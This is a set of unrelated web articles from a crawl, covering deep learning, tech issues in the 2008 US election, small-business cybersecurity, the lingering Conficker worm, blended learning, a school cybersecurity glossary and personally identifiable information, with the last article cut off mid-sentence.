McGregor, founder and principal analyst at Tirias Research. “Right now, deep learning is still in its research phase; this is about perfecting the algorithms,” he told TechNewsWorld. Once it’s perfected, the applications could be unlimited, McGregor added. “Medical is one, where the computer can consider the CT, MRI or X-ray and determine what the image might reveal,” he suggested. Security applications are also possible,” McGregor said. “It could be used in autonomous vehicles where the AI can take all the data that is being presented and develop algorithms that make self-driving cars possible,” he continued. “It is really about teaching intelligent algorithms for almost anything.” AI to the Next Level Visual recognition is just one area of interest. This line of AI research could converge with other advanced computer technologies. “This goes hand in hand with the Internet of Things,” said McGregor. “It is more than just connecting everything through the cloud — it’s building the intelligence into devices around us,” he explained. “This is really just a part of all these things that appear to be independent but are in fact very connected.” Any fears that this could end badly for humanity — as in machines that rise up against their human masters — is probably just science fiction. “Hollywood may make a lot of money about machines wanting to kill us, but that involves so much more including advanced robotics,” McGregor explained. “We’re not even close to that and likely never will be,” he added. “Right now, we’re just at the point where we’re teaching computers to do things better. It was Alan Turing who suggested that it isn’t that machines can’t learn — they just learn differently.”
<urn:uuid:0ecac491-3dea-4feb-951a-95da3e46ad27>
CC-MAIN-2022-40
https://www.crmbuyer.com/story/artificial-intelligence-dreamtime-82199.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00020.warc.gz
en
0.95285
940
3.390625
3
A week — even a day — can make a world of difference in a presidential election. Witness the fact that nearly right up to the minute the still-unfolding Wall Street crisis came to a boil, the issue getting the most play in campaign speeches was oil prices. There was even a fair amount of speculation that one of John McCain’s primary motives for placing Sarah Palin second on his ticket was her geographic proximity to the Alaskan oil fields and her support of the effort to allow further exploration of them. Despite the fact that the issue du jour has shifted, however, technology — and its impact on a host of hot-button topics — has kept its front-and-center position in many discussions of presidential politics, the candidates and America’s future. For starters, it’s worth noting that one of the most important technology matters in November likely will be the election process itself. The last two presidential elections, in 2000 and 2004, were two of the closest in American history. Not surprisingly, this fact alone has generated intense interest in how votes are collected, tallied and recorded. In the aftermath of those elections, state governments have come under intense pressure to streamline voting operations, and they are looking to technology both to improve accuracy and lower the costs of running elections. Along with the advent of computerized voting, however, have come questions about exactly how software-based elections can be monitored and verified. Many groups advocate establishing a paper trail, whereby individual votes can be legitimized in hard copy. Barack Obama favors ballot receipts verified by individual voters; he cosponsored the “Ballot Integrity Act of 2007.” John McCain has not made a clear statement on the particulars of election process reform. Still, public discourse on whether polling places should use optical scanners, touch-screen systems, or other computer technology to gather and count votes largely misses the central point, according to Thad Hall, assistant professor of political science at the University of Utah. “Elections are an administrative activity,” Hall told TechNewsWorld. “We keep focusing on the shiny toys instead of procedures.” It is the procedures themselves — like keeping a careful chain of custody of ballots and voting machines of whatever kind — that make the difference between a well-run election and a botched one. Because presidential elections draw voters who may not vote during the intervening four years, it is likely there will be problems in various locations across the country this November, Hall predicted. Exactly where those problems occur, though, could be crucial to election outcomes. “In Hawaii, they could lose a bunch of Obama ballots and it wouldn’t make any difference,” he quipped. That’s because states with a clear blue or red leaning will remain so, despite any implementation issues with voting technology. “If you’re an election official in any battleground state — Florida, Ohio, or New Mexico, for example — and you screw up, it’s going to be a big deal,” said Hall. Consequences of a technology glitch in states where the race for electoral votes may come down to thousands, or just hundreds, of ballots could include legal action by one or both campaigns and, more damaging, long-term loss of voter confidence in the election process itself. Any information technology professional will be familiar with the advice Hall has for officials looking to avoid technology-related problems in November. “The key is to think through the procedures and training,” he noted. “If IBM was implementing a computer system for a company, they would never turn to the company and say, ‘This system is going to fix everything for you, and don’t worry about the training or procedures part, like the security of your data.'” The mechanics of the election aside, among the more prominent technology-related issues included in stump speeches is how the U.S. will continue to feed its voracious energy appetite. Offshore drilling may be getting the most attention, but alternative energy sources feature prominently in both presidential candidates’ plans for addressing the rising cost of oil. However, irrespective of Congress’ loosening of restraints on offshore oil drilling, “new oil reserves will be slow in coming,” Don Challman, associate director and general manager of the University of Kentucky’s Center for Applied Energy Research, told TechNewsWorld. The future of energy use in the transportation arena, he asserted, will be much more contingent on making more efficient vehicles than on tapping new sources of oil. Making those vehicles a reality remains an issue on which the federal government largely has dropped the ball, through both Democratic and Republican administrations, stressed Challman. “In my 30 years in the field,” he noted, “federal funds for this kind of research have been declining.” By contrast, research on alternative energy technologies is exactly the kind of field in which the federal government should be playing a major role, he argued. “This kind of research is high risk and very expensive,” explained Challman. “It needs leaders to get going, and then, eventually, it will be commercialized. It’s basic and applied research that will get these new kinds of vehicles going — then industry will do the ‘D’ part of R&D.” In fact, the federal government funds a big percentage of all kinds of basic research in the United States. Another field of research getting political attention this election season is the use of embryonic stem cells. John McCain has changed his position on the topic of federal funding of scientific research using stem cells, according to the nonpartisan, nonprofit Web site ProCon.org. As recently as May of 2007 in a Republican presidential debate in Simi Valley, Calif., McCain expressed support for grant projects involving stem cells and their potential use in treating serious illnesses such as diabetes and Parkinson’s disease. Since then, however, he has formally opposed the use of federal funds for research involving stem cells, according to the document, Human Dignity & the Sanctity of Life,” on his official campaign Web site. Barack Obama, on the other hand, is a long-time supporter of research utilizing stem cells and related technologies. He cosponsored the “Stem Cell Research Enhancement Act of 2007.” Both candidates have pointed out that the stem cell lines that are the subject of the research funding debate already exist and would be destroyed if research programs were discontinued. While the implications of the federal government’s attitude toward medical research using stem cells may not be grabbing headlines this week, it remains an important issue to voters. In fact, it was the most popular technology-related search term at the ProCon.org Web site during the period from July 1 through this week, site managing editor Kamy Akhavan told TechNewsWorld. Overall, though, the subject ranked 25th in popularity among the 65 issues tracked by the site, indicating that perhaps voters are not as focused on this controversy as they were even six months ago.
<urn:uuid:9213c8cd-d070-47f6-adea-52e6d91e7170>
CC-MAIN-2022-40
https://www.crmbuyer.com/story/while-wall-street-burns-candidates-views-on-tech-issues-simmer-64614.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00020.warc.gz
en
0.960636
1,475
2.609375
3
- Fully Managed Technology Services - Co-Managed Technology Services By definition, Cybersecurity means measures taken to protect computers, servers, mobile devices, electronic systems, networks, and data against unauthorized access, theft, or malicious attacks. Trying to keep up with the latest technology advances can be mind-numbing, and knowing which ones are right for your business is an even greater challenge. Whichever technology solutions you choose, they will need to be integrated with various online platforms including email servers, applications, mobile devices, Cloud-based software, customer portals, and more. If just one of those entry points is vulnerable, they all are. The Dark Web — a virtual marketplace for cyber crime — is a place where modern criminal activities originate, and it’s also where stolen consumer data is bought and sold. The reason why keeping systems secure is so difficult is because of an underground network of criminals who conduct their “business” on the Dark Web. Online activities are encrypted, making it difficult to discover hackers’ identities and stop their efforts. Why do hackers want to breach your systems? For some, it’s the money they can make selling your intellectual property or customer data on the Dark Web. Sometimes these criminals can lurk inside your networks undetected and retrieve your data without you ever knowing. Others want to disrupt your operations and hold your systems hostage in exchange for ransom. And then there are those who simply want the satisfaction of knowing they can infiltrate systems to wreak havoc. No matter the intent, the threats are real. Learn everything you ever wanted to know about the various types of cyberattacks by checking out the following resources and articles. The first computer virus named “Creeper” was discovered on an experimental computer network that predated the internet. The first “computer worm” infected computers running UNIX. Due to a miscalculation by the creator of this worm, it spread across the internet, gaining major media attention. Aggressive viruses infected millions of PCs and crippling email systems worldwide. Cyberattacks became a major concern, prompting the rise of antivirus software. Starting in 2000, a 15-year-old boy, known as “Mafiaboy,” launched an attack on commercial websites, causing more than $1 billion in damage. Victims included Amazon, CNN, eBay and Yahoo! The number of data breaches continues to compound. Notable recent attacks include Equifax, Target, Sony, Adobe, and others. Credit card hacks, malicious ransomware, stealing of personal identifying information, and more have been the motivations. Many organizations go to extraordinary lengths to protect their businesses from various disruptions and downtime — everything from reducing employee turnover to preventing property damage and upgrading equipment. According to many experts, however, cyberattacks are the #1 threat to global organizations, yet many don’t implement adequate measures to mitigate the risks. Check out the following resources to get a better sense of what you may be up against. There’s no silver bullet for preventing cyberattacks. As technology evolves and advances, so do the tactics of hackers. There are myriad ways to infiltrate systems, and a multi-faceted approach needs to be taken to mitigate the risks and stay on top of the latest threats. Even though emphasis is placed on thwarting cyber criminals through technology-based solutions, the best way to protect an organization’s data and systems is to educate employees. Human beings are the most common security flaw. Provide the greatest protection for your systems by ensuring your employees don’t mistakenly open the door to hackers. In addition to educating employees, there are steps your business can take to mitigate the risks of a cyberattack. Whether arming your systems with the latest firewalls or preventing unauthorized applications, use these resources to help keep your networks secure. It’s easy to focus on computers, servers, and software when it comes to cybersecurity. However, there are other potential entry points in the average business that are often overlooked. Unfortunately, there is no guarantee against cyberattacks. As shown in recent, high-profile attacks, even the most aggressive security measures and sophisticated software can be susceptible. Preventative efforts are critical, but so are the strategies for responding should a successful cyberattack occur. The potential for cyber incidents will only continue to climb as technology advances. By implementing the strategies outlined here, combined with the help of Managed IT professionals, you can stay one step ahead of cyber criminals. Start taking preventative measures today by requesting a complimentary risk assessment of your existing IT environment. Just complete the following form.
<urn:uuid:92a71dca-864d-48f4-9587-9a75c6b9c1ca>
CC-MAIN-2022-40
https://www.gflesch.com/elevity/cybersecurity-for-business
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00020.warc.gz
en
0.936137
964
2.625
3
It’s been over seven years since the Conficker worm spread around the world, cracking passwords, exploiting vulnerabilities, and hijacking Windows computers into a botnet to distribute spam and install scareware. It became one of the most serious malware outbreaks of all time. Microsoft even offered a $250,000 reward for anyone offering information that would lead to Conficker’s creator. As far as I’m aware, that bounty has never been paid and the malware authors remain at large. So, you may be wondering, what of Conficker today? Well, according to the latest statistics provided by Check Point, Conficker remains the top malware attacking its UK corporate customers – accounting for some 1 in 5 of all detections. As The Register reports, Conficker may not be causing as many problems as it did seven years ago – but plenty of computers remain infected, allowing the worm to continue to try to find other Windows systems to infect. The Conficker Working Group, which tracks the number of unique IP addresses on the internet that are infected with Conficker, estimates that over 600,000 unique IP addresses remain infected by the malware. As long as there are Conficker-infected computers connected to each other, the malware will continue to hunt for new victims. Most of the malware we see today doesn’t spread via its own steam like the Conficker worm. Instead malicious hackers write Trojan horses that are designed to not draw attention to themselves, and are sometimes sent only to a small list of targets to improve their chances of infecting systems undetected and give attackers access to your files and communications. Every good anti-virus program (in fact, most of the really crummy ones as well) can detect Conficker. The problem is that the computers infected with Conficker attempting to infect other Windows PCs aren’t running anti-virus software. Ironically, Conficker should never have been capable of spreading in the first place – as Microsoft issued a patch for the vulnerability that Conficker relied upon a full 29 days before Conficker began to spread. Be a responsible part of the internet community. Make sure that all of the computers under your control are strongly defended against malware attacks with security software and patches. Don’t allow one computer in the corner of the room to be the one that continues to spread malware that has no right to carry on living. Found this article interesting? Follow Graham Cluley on Twitter to read more of the exclusive content we post.
<urn:uuid:92318d4d-fcfb-47b6-a839-1bfaef50f9ad>
CC-MAIN-2022-40
https://grahamcluley.com/seven-years-conficker-worm-dead-dominating/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00020.warc.gz
en
0.944157
515
2.5625
3
During the worldwide COVID-19 pandemic, it became clear that there is a digital divide and not all students have the same access to educational technology. Some students may rely on the computers and internet access that is provided in an on-campus setting and may not have the same type of technology available to them at home. This can be due to financial reasons or simply because they live somewhere where internet access is not as strong. While it can be difficult to overcome these challenges, higher education organizations can support students by checking that the majority of students have access to the technology they need. With the financial savings made through blended learning, providing some students with computers on loan or ensuring they have a means of getting online could be a possibility for universities. Lack of contact When it comes to working away from campus rather than in a traditional classroom setting, the issue of isolation can become prominent. Students can become increasingly lonely with a lack of direct contact which can cause an increase in mental health issues and a disconnect from peers and tutors. This makes it vital for organizations to offer resources for mental health support and to ensure that students can connect in a structured way, such as in an online classroom, as well as encouraging social events where possible. Quality of education One complaint about the move to online learning has been about the quality of education. Students feel that they are not getting the same benefits from their classes as they would in person and are concerned that it will have a negative impact on their course. To combat this, organizations should diversify their learning model to help with student engagement. Help and support When staff are on-site in a higher education setting, they are accessible to students, with office hours that allow them to provide help and support. However, with an online learning or blended learning approach, this can become more difficult. Students may struggle to get in touch with staff or know how to reach out for support when they’re not on campus or in lectures. It is vital that faculty members make it clear how students can get in touch with them by providing them with virtual office hours, either for individuals to reach out or for group meetups. This should also be available when it comes to academic support staff. The main challenge of blended learning for students is that they are required to have a great amount of self-discipline to carry out their education remotely. Students must be given the tools to succeed in this, while staff also check in with them periodically to ensure that they are staying on track and are not becoming bored or complacent about their education.
<urn:uuid:e351a1b1-f7a4-4db0-a48c-c05171afe195>
CC-MAIN-2022-40
https://www.appsanywhere.com/resource-centre/online-or-distance-learning/blended-learning-challenges
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00220.warc.gz
en
0.975726
528
2.8125
3
Cybersecurity Terminology Guide for Schools Cybersecurity Terminology Guide for Schools Download your free copy now All too often in the field, our team has noticed organizations using different terminology to talk about the same concepts. This is especially common in schools where shareholders and clients become parents and teachers, and remote work is known as hybrid learning. As part of our mission to fix the broken cybersecurity industry and get everyone speaking the same language, we’ve created a glossary of cybersecurity terminology used in the education field, and broken down how it varies from the way we discuss security in other settings. Please feel free to distribute our free downloadable glossary as a way to help everyone on the same page. Users/titles in K-12 Students, teachers, staff, instructors, administration, school board, superintendent, principal, vice-principal. CIO, CTO, IT Leader, IT Director, assistant/associate superintendents. The federal education records law is a primary compliance focus. The Family Educational Rights and Privacy Act (FERPA) is a federal law enacted in 1974 that protects the privacy of student education records. FERPA applies to any public or private elementary, secondary, or post-secondary school and any state or local education agency that receives funds under an applicable program of the US Department of Education. The Health Insurance Portability and Accountability Act of 1996 (HIPAA) is a federal law that required the creation of national standards to protect sensitive patient health information from being disclosed without the patient’s consent or knowledge. The US Department of Health and Human Services (HHS) issued the HIPAA Privacy Rule to implement the requirements of HIPAA. The HIPAA Security Rule protects a subset of information covered by the Privacy Rule. COPPA imposes certain requirements on operators of websites or online services directed to children under 13 years of age, and on operators of other websites or online services that have actual knowledge that they are collecting personal information online from a child under 13 years of age. State-Level Privacy Acts Although there is not yet a comprehensive federal law that governs data privacy in the United States, several states have passed their own privacy laws and regulations to address growing security concerns. Some notable instances of this are the California Consumer Privacy Act (CCPA) and the Stop Hacks and Improve Electronic Data Security Act (NY SHIELD Act). These privacy laws vary based on region, and while they can be confusing to navigate, they are important to understand. Osano.com keeps an up to date list of state-level privacy acts that is adjusted when new laws are passed, or existing laws are changed. Training = Professional development Fiscal year = School year (in US Education, that’s July 1-June 30) Parts = Semester, quarter, etc. Business/organization = District, or other agency (COE, BOCES, ESAs, DOEs, etc.) Breach = Digital intrusion Distributed/remote workforce = Hybrid/remote learning Customers/clients, stakeholders = Parents/students Common Term Definitions Verifying the identity of a user, process, or device, often as a prerequisite to allowing access to resources in a system. Ensuring timely and reliable access to and use of information. Preserving authorized restrictions on information access and disclosure, including means for protecting personal privacy and proprietary information. The set of parameters that can be changed in hardware, software, or firmware that affect the security posture and /or functionality of the system. A system or component of a system that is outside of the authorization boundary established by the organization and for which the organization typically has no direct control over the application of required security controls or the assessment of security control effectiveness. External system service A system service that is implemented outside of the authorization boundary of the organizational system (i.e., a service that is used by, but not part of, the organizational system) and for which the organization typically has no direct control over the application of required security controls or the assessment of security control effectiveness. External system service provider A provider of external system services to an organization through a variety of consumer-producer relationships including but not limited to: joint ventures; business partnerships; outsourcing arrangements (i.e., through contracts, interagency agreements, lines of business arrangements (; licensing agreements; and/or supply chain exchanges. A network not controlled by the organization. An occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of a system or the information the system processes, transmits or stores or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies. The protection of information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide confidentiality, integrity, and availability. Any equipment or interconnected system or subsystem of equipment that is used in the automatic acquisition, storage, manipulation, management, movement, control, display, switching, interchange, transmission, or reception of data or information by the executive agency. For the purposes of the preceding sentence, equipment is used by an executive agency if the equipment is used by the executive agency directly or is used by a contractor under a contract with the executive agency which: (i) requires the use of such equipment; or (ii) requires the use, to a significant extent, of such equipment in the performance of a service or the furnishings of a product. The term information technology includes computers, ancillary equipment, software, firmware, similar procedures, services (including support services), and related resources. Guarding against improper information modification or destruction, and includes ensuring information non-repudiation and authenticity. A network where establishment, maintenance, and provisioning of security controls are under the direct control of organizational employees or contractors; or the cryptographic encapsulation or similar security technology implemented between organization-controlled endpoints, provides the same effect (with regard to confidentiality and integrity). An internal network is typically organization-owned yet may be organization-controlled while not being organization-owned. The principle that a security architecture should be designed so that each entity is granted the minimum system resources and authorizations that the entity needs to perform its function. Physical devices or writing surfaces including but not limited to, magnetic tapes, optical disks, magnetic disks, Large-Scale Integration (LSI) memory chips, and printouts (but not including display media) onto which information is recorded, stored, or printed within a system. Authentication using two or more different factors to achieve authentication. Factors include something you know (e.g., PIN number, password); something you have (e.g., device, token, cryptographic identification device); or something you are (e.g., biometric). A system implemented with a collection of interconnected components. Such components may include routers, hubs, cabling, telecommunications controllers, key distribution centers, and technical control devices. A system account with authorizations of a privileged user A user that is authorized (and therefore, trusted) to perform security-relevant functions that ordinary users are not authorized to perform. Access to an organizational system by a user (or a process acting on behalf of a user) communicating through an external network (e.g., the Internet) A measure of the extent to which an entity is threatened by a potential circumstance or event, and typically a function of (i) the adverse impacts that would arise if the circumstance or event occurs; and (ii) the likelihood of occurrence. System-related security risks are those risks that arise from the loss of confidentiality, integrity, or availability of information systems. Such risks reflect the potential adverse impacts to organizational operations, organizational assets, individuals, other organizations, and the nation. The process of identifying risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of a system. Part of risk management, risk assessment incorporates threat and vulnerability analyses and considers mitigations provided by security controls planned or in place. Synonymous with risk analysis. Actions taken to render data written on media unrecoverable by both ordinary and, for some forms of sanitization, extraordinary means. The process to remove information from media such that data recovery is not possible. It includes removing all classified labels, markings, and activity logs. A safeguard or countermeasures prescribed for a system or an organization designed to protect the confidentiality, integrity, and availability of its information and to meet a set of defined security requirements. Security control assessment The testing or evaluation of security controls to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for a system or organization. A discrete, identifiable information technology asset (hardware, software, firmware) that represents a building block of a system. System components include commercial information technology products. Individual, or (system) process acting on behalf of an individual, authorized to access a system.
<urn:uuid:d6249a9d-cb85-41b3-94fb-b49b70b6e981>
CC-MAIN-2022-40
https://frsecure.com/cybersecurity-terminology-guide-for-schools/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00220.warc.gz
en
0.913279
1,960
2.890625
3
Content Management Interoperability Services (CMIS) "An open standard for controlling content and document management systems and repositories using web protocols. In the early 2000s, there was a boom in content management systems for publishing data online. This included applications like Wordpress, Joomla, Drupal, etc. and many more. This Cambrian explosion of content management systems made it such that if you wanted to move between content providers without losing data all systems needed to follow a specific standard. CMIS was created by The Association for Information Management to help make sure that content published online can be ported freely." in other words Zipcodes for the internet.
<urn:uuid:b5f33866-1796-43ba-ab28-867dadb1cb74>
CC-MAIN-2022-40
https://www.intricately.com/glossary/content-management-interoperability-services-cmis
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00220.warc.gz
en
0.908836
132
2.578125
3
New Research Tackles Quantum Error Correction (HPC.Wire) Research co-authored by University of Massachusetts Amherst physicist Chen Wang, graduate students Jeffrey Gertler and Shruti Shirol, and postdoctoral researcher Juliang Li takes a step toward building a fault-tolerant quantum computer. They have realized a novel type of QEC where the quantum errors are spontaneously corrected. Today’s computers are built with transistors representing classical bits (0’s or 1’s). Quantum computing is an exciting new paradigm of computation using quantum bits (qubits) where quantum superposition can be exploited for exponential gains in processing power. Fault-tolerant quantum computing may immensely advance new materials discovery, artificial intelligence, biochemical engineering and many other disciplines. The researchers’ experiment achieves passive QEC by tailoring the friction (or dissipation) experienced by the qubit. Because friction is commonly considered the nemesis of quantum coherence, this result may appear quite surprising. The trick is that the dissipation has to be designed specifically in a quantum manner. This general strategy has been known in theory for about two decades, but a practical way to obtain such dissipation and put it in use for QEC has been a challenge. “Although our experiment is still a rather rudimentary demonstration, we have finally fulfilled this counterintuitive theoretical possibility of dissipative QEC,” says Chen.
<urn:uuid:7a336431-f0a4-430e-9db9-7ee8ce73230d>
CC-MAIN-2022-40
https://www.insidequantumtechnology.com/news-archive/new-research-tackles-quantum-error-correction/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00220.warc.gz
en
0.910143
291
2.859375
3
Sunday, October 2, 2022 Published 2 Years Ago on Wednesday, Oct 28 2020 By Karim Husami The Covid-19 pandemic has changed many aspects of life including education; from the subsequent closure of educational institutions around the world to the rapid adoption of online learning. However, the concept of students studying and learning online started before the spread of the virus with an annual study from the Learning House, a U.S.-based Edtech company, noting that, “the proportion of students studying and learning fully online has risen from under half to fully two-thirds.” A fast internet connection is one of the main criteria for a successful remote learning experience, therefore, 5G will likely facilitate a more seamless learning experience for students across the world. Remote learning based on new technologies has convinced 80 percent of teachers that this new way empowers their teaching process, according to Houghton Mifflin Harcourt’s fourth annual Educator Confidence Report. So how can 5G rollout help Edtech? Allowing students to tap into their imaginative and explorative qualities is an essential step for better learning experiences. Thus, 5G will broaden the scope of technologies used while teaching students new curricula and learning material; for example, it will allow institutions to open availability for virtual and augmented reality with its low latency and peak download speeds, estimated to be as high as 20 gigabits-per-second. “Virtual and augmented reality headsets will allow students to place themselves anywhere in the world and even within a story. These digital experiences will enliven current curricula and allow students to energize their imaginative and explorative qualities, which should be central to educational experiences,” Nicol Turner-Lee, Ph.D. and a fellow at the Brookings Institution’s Center for Technology Innovation said. While 5G offers faster data speeds and enhanced connectivity for many, it may not be accessible to students living in remote or secluded areas. Such a limitation may deepen the digital divide. However, wireless devices are easier to put in place than traditional wired or fiber-based internet, making it a more practical solution. Remote learning with 5G is an opportunity to help schools close the homework gap by boosting mobile learning. “The advent of 5G on mobile devices can help close that gap as students can begin to use faster, more reliable mobile-based connections to complete an assignment, rather than a terrestrial connection,” says Erin Mote, Co-Founder of the Brooklyn Laboratory Charter Schools and Education Technology expert. Our new educational normal will help students and children with special needs. 5G can help by enabling robots to be responsive with students, offering them good learning experiences, as well as being full-time assistants and supporting teachers by responding instantly to the needs of the student with learning exercises. However, a big dilemma is presented here: children from high-income families are spending 30 percent more time on distance learning platforms than those from low-income families. In parallel, 64 percent of secondary pupils in state schools from the wealthiest households are being offered online teaching from schools, compared with 47 percent from poorer families, according to a report from the Institute for Fiscal Studies. The Asus Rog Phone 6 Pro is the latest upgrade to the rog phones family. A great gaming phone with loads of cool features and excellent screen fidelity lets us look closely and see what the fuss is all about. How Good Does It Look The Asus Rog Phone 6 Pro has an intimidating, rough, […] Stay tuned with our weekly newsletter on all telecom and tech related news. © Copyright 2022, All Rights Reserved
<urn:uuid:fee86347-a718-489a-b61b-8b2a0c0c066c>
CC-MAIN-2022-40
https://insidetelecom.com/can-5g-improve-remote-learning-for-all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00220.warc.gz
en
0.952405
765
3.1875
3
It’s very difficult to change the minds of adults on any issue of significance, says author and Harvard psychologist Howard Gardner. But the highest probability of a lasting change of opinion comes when the first six “levers” below are in concert, and the seventh factor, resistances, is low. 1. Reason The rational approach, involving identifying relevant factors and weighing them. This lever is especially important among those who deem themselves to be educated. 2. Research Complementing the use of rational argument is the collection of data, which is used to test trends or assertions. 3. Resonance Whereas reason and research appeal to the cognitive mind, resonance refers to emotions. An opinion or idea resonates when it just “feels right” to a person. 4. Representational redescriptions The repetition of a point of view in many different forms?linguistic, numerical or graphic?to reinforce the message is one of the most important levers for changing people’s minds, Gardner says. 5. Resources and rewards Money and other resources can be applied directly (as a bonus, for example) or indirectly (as a donation to a charity as long as the philanthropist’s wishes are adopted). Unless resources and rewards work together with other mind-changing levers, however, a new course of thought is unlikely to last when the money runs out. 6. Real-world events The use of news stories and events to bolster one’s perspective can be effective in changing minds. Some real-world events, such as the 9/11 terrorist attacks, can affect so many people so deeply that they cause a mass change of mind. 7. Resistances Barriers to changing one’s mind are created by age (as people get older, their neural pathways are less susceptible to alteration), the emotion that a topic creates and the public stand one has previously taken on a topic.
<urn:uuid:470ca2f0-97e1-4b30-bda7-7d3b2a1e9a80>
CC-MAIN-2022-40
https://www.cio.com/article/272572/change-management-seven-ways-to-effect-change.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00220.warc.gz
en
0.93239
401
3.0625
3
With public concern over online fraud, new research, funded by the Economic and Social Research Council, has revealed that internet users will reveal more personal information online if they believe they can trust the organisation that requests the information. ‘Even people who have previously demonstrated a high level of caution regarding online privacy will accept losses to their privacy if they trust the recipient of their personal information’ says Dr Adam Joinson, who led the study. The findings of the study are vital for those aiming to create online services that pose a potential privacy threat, such as Government agencies involved in developing ID cards. The project found that even those people who declared themselves unconcerned about privacy would soon become opposed to ID cards if the way that they were asked for information made them feel that their privacy was threatened. The ‘Privacy and Self-Disclosure Online’ project is the first of its kind, in that rigorous methods were used to measure internet users actual behaviour. Dr Joinson explains; ‘For the first time we have research which actually analyses what people do online, rather than just looking at what they say they do.’ 56 percent of internet users stated that they have concerns about privacy when they are online. The central issue was whether websites were seen as particularly trustworthy – or untrustworthy – causing users to alter their behaviour. When a website is designed to look trustworthy, people are willing to accept privacy violations. But, the same actions by an untrustworthy site leads to people behaving in a much more guarded manner. In addition, the researchers looked at how the wording of questions and the design of response options further influenced levels of self-disclosure. If the response ‘I prefer not to say’ appears at the top of an options list, users are far less likely to disclose information. Similarly, if given the opportunity to remain vague in their responses, for instance in choosing how wide the scale that represents their salary is, they are more likely to opt for less disclosure – in this case, users tended to opt for a broad scale, such as £10,000 - £50,000 per year. ‘One of the most interesting aspects of our findings,’ says Dr Joinson, ‘is that even people who genuinely have a high level of concern regarding privacy online may act in a way that is contrary to their stated attitudes when they come across a particular set of conditions.’ The implications of this are wide ranging. Many services now require a level of online disclosure. According to this research, how a user assesses the trustworthiness of a website may have a real impact on the success of that service. In addition, research findings will be used to guide policy regarding how the public can be encouraged to make informed choices regarding online privacy. The project has targeted a number of groups who can benefit from the findings, including health professionals, higher education professionals and survey bodies.
<urn:uuid:c89b20a4-5fb1-4577-a431-361c0a451c2d>
CC-MAIN-2022-40
https://www.itproportal.com/2007/11/22/internet-users-give-privacy-exchange-trust/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00220.warc.gz
en
0.965131
591
2.796875
3
You can benefit a lot from being as informed as possible about personally identifiable information (PII), especially because of how it relates to data privacy. It’s common for this data to be used for illegal purposes like identity theft and fraud, so protecting it may literally save your life. So what can you, as an innocent web browser, do to protect yourself? Or if you’re a website owner, how do you protect your users and your company from falling prey to privacy breaches? Read on as we explore PII in more detail and the steps you can take to protect it from bad agents. What Is Personally Identifiable Information (PII) Anyway? While Personally Identifiable Information (PII) has several formal definitions, from a general perspective it’s information that organizations can use to identify, contact, or locate a single person—or to identify an individual in context. In other words, it’s any data that can be used to identify individuals either directly or indirectly. PII includes direct identifiers (passport information, Social Security number, driver’s license, etc.) that can identify a person uniquely, as well as quasi-identifiers (race, zip code, etc.) that can be combined with other quasi-identifiers (date of birth, gender, etc.) to recognize an individual. We’ll discuss these in more detail later. The National Institute of Standards and Technology (NIST) explains PII as: “…any information about an individual maintained by an agency, including any information that can be used to distinguish or trace an individual’s identify such as name, social security number, date and place of birth, mother’s maiden name, or biometric records; and any information that is linked or linkable to an individual with additional information, such as protected health information, educational, financial and employment information.” It’s an organization’s responsibility to ensure compliance with the applicable data protection laws. One of the first steps towards compliance is knowing which data is considered PII (or personal data) and whether it requires additional safeguards. But as there’s no single source of the PII definition, you should instead use individual assessment to correctly determine what PII is (and what it isn’t). Just pay attention to the laws, procedures, regulations, and/or standards governing your specific industry or field, and you’ll have a clearer picture. How Personally Identifiable Information (PII) Works Technological advancements have forever changed data processing and data handling. Businesses operate differently; governments legislate differently; individuals relate differently. Let’s also not forget digital tools like cell phones, ecommerce, social media, and of course, the internet have caused an explosion in the supply of all kinds of data that are known as big data. Big data is a wealth of information that is being collected, analyzed, and processed by businesses and shared by other companies to gain key insights into how to improve customer interaction. However, its emergence has also resulted in a corresponding increase in the number of data breaches and cyberattacks by bad actors who realize the value of this information. The direct result? Regulatory bodies are seeking new laws to protect consumer data while users are trying to figure out anonymous ways to stay digital. Sensitive Personally Identifiable Information vs. Non-Sensitive Personally Identifiable Information You can classify PII into two categories: sensitive and non-sensitive. Sensitive personal information includes legal stats, like full name, driver’s license, Social Security number, meeting address, potential information, passport information, credit card information, medical records, and so on. Companies that share data about their clients use various anonymization techniques to encrypt and obfuscate the PII, converting it into a non-personally identifiable form. For instance, an organization that shares its clients’ information with a marketing company will anonymize the sensitive PII in the data, leaving out only that information that’s relevant to the marketing company’s goal. On the other hand, non-sensitive or indirect PII can be accessed from public sources like the internet, phone books, and corporate directories. Some common examples include zip code, gender, race, date of birth, place of birth, and religion. You may have noticed how the examples include quasi-identifiers—something that can generally be safely released to the public. But this doesn’t mean sensitive information cannot be potentially dangerous. You see, although non-sensitive information isn’t delicate, it is linkable. This means that non-sensitive data, when used with other personal linkable information, can reveal the identity of an individual. Moreover, the de-anonymization and re-identification techniques are more likely to be successful when multiple sets of quasi-identifiers are combined together to distinguish one person from another. For example, experts found that 